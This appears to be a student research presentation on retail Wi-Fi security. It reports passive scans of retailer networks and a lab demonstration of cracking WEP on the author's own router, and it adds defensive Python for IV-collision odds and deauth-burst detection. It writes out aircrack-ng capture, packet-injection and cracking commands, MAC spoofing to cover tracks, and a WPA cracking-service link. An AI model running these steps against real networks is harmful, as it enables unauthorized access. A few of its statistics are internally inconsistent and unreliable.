An Empirical Study on Wireless Network Security for Retailers

Date post: 31-Dec-2015

Khai Tran

Introduction

- Retail merchants have been incorporating wireless solutions into their networks to increase efficiency and enhance the customer experience in order to increase margins.
  - Apple – wireless handheld devices that provided credit authorization
  - Starbucks – free Wi-Fi access for AT&T customers or those who wish to pay a fee of $3.99 for two hours
  - Home Depot – wireless handheld devices are used throughout the store to perform inventory, price changes, and various other tasks
- In doing so, some merchants are potentially opening up their doors to unlawful access by hackers who intend to do harm.

Lowe’s and TJX

- Lowe’s - 2003
  - Loosely protected wireless connection in Southfield, MI branch led to intrusion
  - Trio of hackers (Brian Salcedo, Adam Botbyl, Paul Timmons) installed “hacking” software and were able to access Lowe’s stores in CA, KS, SD, and other states
- TJX - 2005
  - Two Miami-area Marshalls stores were compromised due to a breach in their unsecured wireless network
  - Intruders had access to millions of credit card numbers due to weak data encryption

Purpose

- Are Retailers Still Using WEP?
- Goals:
  - Scan wireless networks of retailers to determine if networks are secured and what type of security is in use
  - As a proof of concept, set up a personal WLAN and attempt to crack WEP and WPA passwords to determine feasibility of attacks

WEP (Wired Equivalent Privacy)

- Introduced in 1997 to secure 802.11 wireless networks
- Several weaknesses detected in 2001
  - Simple Initialization Vector (IV)
    - 24 bits
    - Repeats after about 5000 packets
  - Single shared key
  - Susceptible to eavesdropping
- Declared by IEEE in 2004 as failing to meet security requirements
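
The short IV is the reason reuse shows up so quickly on a busy network. The following Python is an added example, not part of the original slides: it computes the birthday-bound chance that two packets share an IV and confirms it by simulation. It assumes each packet's IV is picked uniformly at random; the 48-bit figure is included only to show how the size of the space changes the result.

```python
import math
import random
import statistics

def collision_probability(packets: int, iv_bits: int) -> float:
    """P(at least two of `packets` uniformly random IVs match), birthday approximation."""
    space = 2 ** iv_bits
    return -math.expm1(-packets * (packets - 1) / (2 * space))

def packets_for_probability(target: float, iv_bits: int) -> int:
    """Smallest packet count whose collision probability reaches `target`."""
    space = 2 ** iv_bits
    # Closed-form estimate from n^2 / (2N) = -ln(1 - target), then step to the threshold.
    n = max(2, int(math.sqrt(2 * space * -math.log1p(-target))))
    while collision_probability(n, iv_bits) < target:
        n += 1
    return n

def simulate_first_repeat(iv_bits: int, rng: random.Random) -> int:
    """Draw random IVs until one repeats; return the number of packets sent."""
    seen = set()
    while True:
        iv = rng.getrandbits(iv_bits)
        if iv in seen:
            return len(seen) + 1
        seen.add(iv)

def mean_first_repeat(iv_bits: int, trials: int = 300, seed: int = 1) -> float:
    """Average packets-until-first-repeat over `trials` simulated sessions."""
    rng = random.Random(seed)
    return statistics.mean(simulate_first_repeat(iv_bits, rng) for _ in range(trials))

if __name__ == "__main__":
    print("P(repeat) after 5000 packets, 24-bit IV:",
          round(collision_probability(5000, 24), 3))
    print("packets for a 50% chance, 24-bit IV:", packets_for_probability(0.5, 24))
    print("simulated mean packets to first repeat:", round(mean_first_repeat(24)))
    # Assumption: random selection from a 48-bit space, shown for scale only.
    print("packets for a 50% chance, 48-bit space:", packets_for_probability(0.5, 48))
```

Under the random-IV assumption the first repeat arrives after roughly five thousand packets, which is consistent with the figure on the slide.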

WPA/WPA2 (Wi-Fi Protected Access)

- Introduced in 2003 to replace WEP
- IV is increased from 24 to 48 bits
  - Re-use of keys is unlikely
- 256 bit keys as opposed to 128
  - 2^128
- Implements TKIP (Temporal Key Integrity Protocol) to support pre-WPA

Tools Used for Passive Scans

- OCZ Neutrino netbook
  - Windows XP SP3
  - Intel Atom (N270) 1.60 GHz, 2.0 GB RAM
  - RealTek RTL8187SE Wireless LAN PCIE
- WirelessNetView software
  - Created by Nir Sofer
  - Version 1.26
  - www.nirsoft.net
  - Why was WirelessNetView chosen for passive scans?
- Cities scanned
  - Sacramento
  - Citrus Heights
  - Roseville
  - Oroville
  - Chico

Sample Scan with WirelessNetView

Scan Results

- 65 retail networks were scanned over a period of two weeks
- Security
  - Less than 17% (11) were still using WEP to secure their network
  - Of the 17%, only three (0.5%) were Big Box retailers while all the others were small local retail shops
  - Most retailers have adopted WPA
- No Security
  - Just over 26% (17) had no security on their network
  - 13 of these 17 were Big Box retailers

What is BackTrack?

- Created by Mati Aharoni and Max Moser
- Supported by Linux community
- www.remote-exploit.org
- Live Linux distro based on Slackware and available as a Live CD or on USB boot
- Includes tools such as kismet, metasploit, wireshark
- Used for pen testing, network security and analysis

Tools Used For Cracking

- Dell Latitude D820
  - Windows XP SP2
  - Intel Core 2 (T7200) 2.00 GHz, 2.0 GB RAM
  - Intel PRO/Wireless 3945ABG
- 2Wire 3800HGV-B Uverse Router
  - WEP, WPA, WPA2
- BackTrack version 3
  - airmon-ng
  - airodump-ng
  - aireplay-ng
  - aircrack-ng
  - macchanger

Steps to Cracking WEP

- Spoof MAC address
- Turn wireless card into monitoring mode
- Scan available networks and capture packets
- Inject ARP-request packets into network to generate traffic
- Feed data to aircrack-ng for password cracking

Check Wireless Driver

Spoof MAC

Covering your tracks…

Search Available Networks

    # airodump-ng wifi0

Capture Packets On Target Network

    airodump-ng -c 3 -w smacs --bssid 00:21:7C:4E:89:51 wifi0

Inject Packets & Attempt to Crack

    aireplay-ng -3 -b 00:21:7C:4E:89:51 -h 00:11:22:33:44:55 wifi0
    aircrack-ng -b 00:21:7C:4E:89:51 smacs-01.cap

WEP Cracking Demonstration

- Linksys Wireless-G Router (WRT54G)
- SSID - 693TEST
- MAC – 00:1D:7E:35:AA:6D

Cracking WPA

- Requires deauthentication from AP and re-authentication
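
Because this approach depends on forcing a client off the AP and watching it re-authenticate, a burst of deauthentication frames followed by a fresh handshake is a useful signal for a wireless IDS. The following Python is an added example, not part of the original slides: a sliding-window detector over frame records. The record layout, the MAC addresses, the sample frames and the thresholds (5 deauths in 10 seconds, handshake within 30 seconds) are all constructed assumptions.

```python
from collections import defaultdict, deque

AP = "02:00:00:00:00:01"  # constructed BSSID
# Constructed sample records: (timestamp_seconds, frame_subtype, bssid, client_mac)
FRAMES = (
    # Client 0a: one deauth then a handshake, i.e. an ordinary reconnect.
    [(3.0, "deauth", AP, "02:00:00:00:00:0a"), (4.0, "eapol", AP, "02:00:00:00:00:0a")]
    # Client 0b: six deauths in half a second, then a new handshake.
    + [(20.0 + 0.1 * i, "deauth", AP, "02:00:00:00:00:0b") for i in range(6)]
    + [(22.0, "eapol", AP, "02:00:00:00:00:0b")]
    # Client 0c: five deauths spread over a minute, never dense enough to alert.
    + [(15.0 * i, "deauth", AP, "02:00:00:00:00:0c") for i in range(5)]
)

def detect_deauth_bursts(frames, threshold=5, window=10.0, reauth_within=30.0):
    """Return one alert per (bssid, client) pair that received `threshold`
    deauth frames within `window` seconds. `reauth` is True when an EAPOL
    handshake frame for the same pair followed within `reauth_within` seconds."""
    recent = defaultdict(deque)  # (bssid, client) -> deauth timestamps in window
    alerts = {}
    for ts, subtype, bssid, client in sorted(frames):
        key = (bssid, client)
        if subtype == "deauth":
            stamps = recent[key]
            stamps.append(ts)
            while ts - stamps[0] > window:  # drop timestamps older than the window
                stamps.popleft()
            if len(stamps) >= threshold:
                alert = alerts.setdefault(
                    key, {"bssid": bssid, "client": client,
                          "start": stamps[0], "reauth": False})
                alert["end"] = ts
        elif subtype == "eapol" and key in alerts:
            if ts - alerts[key]["end"] <= reauth_within:
                alerts[key]["reauth"] = True
    return list(alerts.values())

if __name__ == "__main__":
    for alert in detect_deauth_bursts(FRAMES):
        print(alert)
```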

WPA-PSK Cracking Service

www.wpacracker.com

Conclusion

- Big Box Retailers
  - Most have either adopted WPA to secure their network or provided public portals for user authentication
- Small & Local Retail Shops
  - A small number are still using WEP or no security at all

Afterthoughts

- Residential Wireless Networks
  - A lot of networks are still using WEP
- Scan of Nord Ave
  - 182 networks detected
  - 36% (65) are using WEP
  - Out of the 182 networks, 29 are obvious 2WIRE### routers
    - 27 of these are using WEP
- 2006 survey by A. Bittau, M. Handley, and J. Lackey
  - 400 networks scanned in London
    - 76% WEP, 20% WPA, 4% 802.11i
  - 2,539 networks scanned in Seattle
    - 85% WEP, 14% WPA, 1% 802.11i

2WIRE WEP Networks

Questions?

References

- Andrea Bittau, Mark Handley, Joshua Lackey, "The Final Nail in WEP's Coffin," pp. 386-400, 2006 IEEE Symposium on Security and Privacy (S&P'06), 2006.
- Highspeed internet access at Starbucks. (2009). Retrieved from http://www.starbucks.com/retail/wireless.asp
- Kjell J. Hole, Erlend Dyrnes, Per Thorsheim, "Securing Wi-Fi Networks," Computer, vol. 38, no. 7, pp. 28-34, July 2005, doi:10.1109/MC.2005.241
- Carsten Maple, Helen Jacobs, Matthew Reeve, "Choosing the Right Wireless LAN Security Protocol for the Home and Business User," pp. 1025-1032, First International Conference on Availability, Reliability and Security (ARES'06), 2006.
- Carmen Nobel. (November 21, 2005). Home Depot Tackles Network Challenge. Retrieved from http://www.eweek.com/c/a/Mobile-and-Wireless/Home-Depot-Tackles-Network-Challenge/
- Kevin Poulsen. (November 12, 2003). Wireless hacking bust in Michigan. Retrieved from http://www.securityfocus.com/news/7438
- Kim Zetter. (October 26, 2007). TJX Failed to Notice Thieves Moving 80-GBytes of Data on its Network. Retrieved from http://www.wired.com/threatlevel/2007/10/tjx-failed-to-n/
- Kim Zetter. (July 17, 2009). 4 Years After TJX Hack, Payment Industry Sets Security Standards. Retrieved from http://www.wired.com/threatlevel/2009/07/pci/
- Songhe Zhao, Charles A. Shoniregun, "Critical Review of Unsecured WEP," pp. 368-374, 2007 IEEE Congress on Services (Services 2007), 2007.
- www.nirsoft.net/about_nirsoft_freeware.html
- http://it.slashdot.org/story/09/12/07/2322235/WPA-PSK-Cracking-As-a-Service
- www.aircrack-ng.org

